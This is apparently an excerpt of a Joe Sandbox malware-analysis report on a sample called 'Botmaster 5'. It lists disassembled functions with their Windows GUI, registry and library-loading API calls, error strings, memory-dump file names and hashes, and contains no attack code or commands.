                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041F408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 274COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0041F484
                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 0041F51E
                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,?), ref: 0041F556
                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041F56B
                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041F580
                                                                                                                                                                                                                  • GetStockObject.GDI32(0000000C), ref: 0041F5A1
                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041F5AE
                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0041F5E5
                                                                                                                                                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000487,?,?,?,?,?), ref: 0041F838
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$ColorSelectWindow$CallCtrlParentProcRedrawStockText
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1925425399-3916222277
                                                                                                                                                                                                                  • Opcode ID: 039f1c7060621e8b4a725f685361760f6371f19ffb0d164b1fdce7a538baf77c
                                                                                                                                                                                                                  • Instruction ID: d3177021a1357edcbfc3fc271e1064a320335ee9a803690274f6c989191f14f7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 039f1c7060621e8b4a725f685361760f6371f19ffb0d164b1fdce7a538baf77c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAC11E71108345AFCB00EF10D981A9A77A1FB58308F50483AF9A587362E379DDD6DB6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041E25B Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 201windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 0041E41F
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001302,00000000,00000000), ref: 0041E43C
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000133C,?,?), ref: 0041E471
                                                                                                                                                                                                                  • ImageList_GetIcon.COMCTL32(?,?,00000000,?,0000133C,?,?,?,00001302,00000000,00000000,?), ref: 0041E489
                                                                                                                                                                                                                  • ImageList_GetIconSize.COMCTL32(?,?,?,?,00001302,00000000,00000000,?), ref: 0041E4C7
                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0041E502
                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041E513
                                                                                                                                                                                                                  • DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 0041E56B
                                                                                                                                                                                                                  • DrawTextW.USER32(?,?,00000000,?,?), ref: 0041E5AC
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Icon$DrawImageList_MessageSendText$ColorFillModeRectSize
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 69545562-3916222277
                                                                                                                                                                                                                  • Opcode ID: cb955631452d4123f537d4216706f49ce04a8026a6f53149518f1fc42d43a295
                                                                                                                                                                                                                  • Instruction ID: ffe2780390cae8081ad6e040b550847ef34d53d004812d62a35f891af46fb6b7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb955631452d4123f537d4216706f49ce04a8026a6f53149518f1fc42d43a295
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93814E75104309AFCB10EF51D881B9EB7E4FB4C318F40442AFEA997262D375AAA1CF56
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040BEDC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,00000000,00000001,00000000,00000000,?,?,?,?,00000000), ref: 0040C0D5
                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000002,000F003F,-00000002,00000000,00000000,?,00000000,000F003F,00000000,00000000,?,?,00000001), ref: 0040C144
                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000002,000F003F,-00000002,00000000,00000000,?,00000000,000F003F,00000000,00000000,?,?), ref: 0040C15F
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  • ERROR, subkeyname is empty, xrefs: 0040BFA8
                                                                                                                                                                                                                  • ERROR, #HKEY is empty, xrefs: 0040BF7D
                                                                                                                                                                                                                  • ERROR, sub key dont exist, xrefs: 0040BFFA
                                                                                                                                                                                                                  • ERROR, valuename is empty, xrefs: 0040BFD0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                  • String ID: ERROR, #HKEY is empty$ERROR, sub key dont exist$ERROR, subkeyname is empty$ERROR, valuename is empty
                                                                                                                                                                                                                  • API String ID: 779948276-2765302221
                                                                                                                                                                                                                  • Opcode ID: 2602e502e8ee25985a0d1bda8d9efc3729714d359802ce101e6c59589d187d5c
                                                                                                                                                                                                                  • Instruction ID: 476f842a8bc2c56f2606d2f9c60d5c136b0543ee3792fdbe89f7a1e8f2e0cb25
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2602e502e8ee25985a0d1bda8d9efc3729714d359802ce101e6c59589d187d5c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E715030218301ABC701AB21DC82A6F77A5EF44308F60893FF585A61A1D7799C55DB9F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040BC20 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 186registryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?,00000001,00000000,00000000,?,?,?,00000000), ref: 0040BDFB
                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,000F003F,00000004,00000000,?,00000000,000F003F,?,?,?,?,00000001,00000000), ref: 0040BE60
                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,000F003F,00000004,00000000,?,00000000,000F003F,?,?,?,?,00000001), ref: 0040BE7B
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  • ERROR, subkeyname is empty, xrefs: 0040BCDF
                                                                                                                                                                                                                  • ERROR, #HKEY is empty, xrefs: 0040BCB4
                                                                                                                                                                                                                  • ERROR, sub key dont exist, xrefs: 0040BD31
                                                                                                                                                                                                                  • ERROR, valuename is empty, xrefs: 0040BD07
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                  • String ID: ERROR, #HKEY is empty$ERROR, sub key dont exist$ERROR, subkeyname is empty$ERROR, valuename is empty
                                                                                                                                                                                                                  • API String ID: 779948276-2765302221
                                                                                                                                                                                                                  • Opcode ID: 6bab226582cec8ed55ba1ef274c11311ab84115574dacb3dbcd67c2b05c8466f
                                                                                                                                                                                                                  • Instruction ID: 292508124cb2e48f0edcbb9f728a4573b1452f89351814ffacfe2de5f0bb6033
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bab226582cec8ed55ba1ef274c11311ab84115574dacb3dbcd67c2b05c8466f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B861B270208301ABD711EB21D882A6F77A5EF44308F60883FF582662A1DB3D9C55DB9F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00426237 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 107memorywindowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetObjectW.GDI32(004239DC,00000018,?), ref: 0042624E
                                                                                                                                                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042625F
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00426271
                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00426286
                                                                                                                                                                                                                  • SetPixel.GDI32(00000000,00000000,004239DC,00FFFFFF), ref: 00426308
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,004239DC,?,00000020,004239DC,?), ref: 00426330
                                                                                                                                                                                                                  • GetStockObject.GDI32(00000004), ref: 0042634F
                                                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 0042635D
                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00426366
                                                                                                                                                                                                                    • Part of subcall function 00425DFF: GetObjectW.GDI32(?,00000018,?), ref: 00425E14
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$Create$BitmapCompatibleDeleteFillFreeHeapPixelRectSelectStock
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3110387212-3916222277
                                                                                                                                                                                                                  • Opcode ID: f58dbb021bc3095fd72d9c8a4a81488f0fef5d96778ccc1cb6febbb8aadab48c
                                                                                                                                                                                                                  • Instruction ID: 4635b914c82113878bb919f444abc4053104a364678fc16af91b344929e0b291
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f58dbb021bc3095fd72d9c8a4a81488f0fef5d96778ccc1cb6febbb8aadab48c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F412471D00128EBCF119F95EC449EEBFB9FF48300F514026F901B6260DBB59A80DBA9
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421514 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 105windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 00421542
                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00421550
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_ClientRect), ref: 0042156E
                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00421580
                                                                                                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?), ref: 004215B3
                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 004215D8
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000044E,00000000,00000000), ref: 004215F1
                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00421621
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$Rect$ClipEnabledExcludeMessagePropReleaseSendmemcpy
                                                                                                                                                                                                                  • String ID: PB_ClientRect$edit
                                                                                                                                                                                                                  • API String ID: 331538487-4290229096
                                                                                                                                                                                                                  • Opcode ID: 3248b1b734a34d2b5fb0215a8b32d1b75fb6c23b2aee6da1c7b54099e8777d7b
                                                                                                                                                                                                                  • Instruction ID: 3be62ae9953ca0b6739306afb312a0f3d49f54294f0e150ec5345dcb160de0c1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3248b1b734a34d2b5fb0215a8b32d1b75fb6c23b2aee6da1c7b54099e8777d7b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0331DA71900219AFDB109BA5DC49EEFBBBCEF48B11F14452AF502E3250D7B49981CBA9
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042388C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0042389D
                                                                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004238C6
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004238DB
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004238ED
                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00423911
                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000000,75C05540,00CC0020), ref: 00423930
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00423939
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0042393E
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00423943
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateDelete$CompatibleObject$SelectStretch
                                                                                                                                                                                                                  • String ID: DISPLAY
                                                                                                                                                                                                                  • API String ID: 2545841238-865373369
                                                                                                                                                                                                                  • Opcode ID: 2850900dd7076643bb0738881363fb2f3021a3a25faf32a39922eed33bc39d5f
                                                                                                                                                                                                                  • Instruction ID: 9a25a0e1f8fff0549429d162ce4e2dc6a6777a9f1e1871838eafadc05b7c73e3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2850900dd7076643bb0738881363fb2f3021a3a25faf32a39922eed33bc39d5f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF21F5B190011DFFDF01AFA5DC84CEEBBB9FB48355B504066F500A2220DBB59E50DB64
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042143E Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Parent$InflatePropRectReleasememcpymemset
                                                                                                                                                                                                                  • String ID: PB_ClientRect$edit
                                                                                                                                                                                                                  • API String ID: 3265583343-4290229096
                                                                                                                                                                                                                  • Opcode ID: baf3e88e358748b2f254903485d3c219a5b358823feb07109157b4d18ee04b54
                                                                                                                                                                                                                  • Instruction ID: f9a3f33424bb977dc09aa93206bdd52ba22aa2d99a7659574328d9935eae6f92
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baf3e88e358748b2f254903485d3c219a5b358823feb07109157b4d18ee04b54
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38213DB1900209AFCB10AFA5DD49DAEBBBDEF44710F108569E416A32A1D7B4A940CF19
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00424033 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 64libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL,00000000,00000000,?,?,?,?,00423DF3,00000000,00000000), ref: 00424053
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00424068
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00424079
                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,00423DF3,00000000,00000000), ref: 004240B4
                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,?,?,?,00423DF3,00000000,00000000), ref: 004240BF
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 004240D0
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Library$AddressLoadProc$Freememset
                                                                                                                                                                                                                  • String ID: COMCTL32.DLL$DllGetVersion$IsAppThemed$uxtheme.dll
                                                                                                                                                                                                                  • API String ID: 2337797191-2634860346
                                                                                                                                                                                                                  • Opcode ID: ac1b26f0b03a50ce917259d43cd1eef3478f2c69f1b9234f3cf78e1c33b0c63f
                                                                                                                                                                                                                  • Instruction ID: 1fde81f8eb6971f66e9393245919fbcd9e1adf9fcf0895d36328792c0f5d195f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac1b26f0b03a50ce917259d43cd1eef3478f2c69f1b9234f3cf78e1c33b0c63f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12114871A0032AAADB209BA5AC04B9A76F8DB44748F514037D601D2190EBF8D5C58FBF
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00423CBD Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 64libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(COMCTL32.DLL,-FFFFFEC7), ref: 00423CDD
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00423CF2
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00423D03
                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00423D3E
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(uxtheme.dll), ref: 00423D49
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00423D5A
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
